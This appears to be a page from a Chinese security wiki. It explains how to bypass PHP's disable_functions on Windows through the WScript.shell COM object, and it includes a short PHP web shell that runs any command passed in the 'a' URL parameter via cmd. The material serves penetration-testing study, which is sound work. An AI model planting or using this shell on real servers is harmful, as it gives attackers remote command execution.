menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-Disable function chevron_right 005-利用系统组件 window com 绕过.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    005-利用系统组件 window com 绕过.md
    1.01 KB / 2021-07-17 00:01:40
        ## 利用系统组件 window com 绕过

**1\. 利用条件**

* Windows
* php5.x(高版本扩展要自己添加)
* 支持COM组件

**2\. 基本原理**

COM组件它最早的设计意图是,跨语言实现程序组件的复用
COM组件由以Win 32动态连接库(DLL)或可执行文件(EXE)形式发布的可执行代码所组成。遵循COM规范编写出来的组件将能够满足对组件架构的所有要求。COM组件可以给应用程序、操作系统以及其他组件提供服务;自定义的COM组件可以在运行时刻同其他组件连接起来构成某个应用程序;COM组件可以动态的插入或卸出应用。

![](images/security_wiki/15904996985860.png)


```php
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

```

![](images/security_wiki/15904997072463.png)
    links
    file_download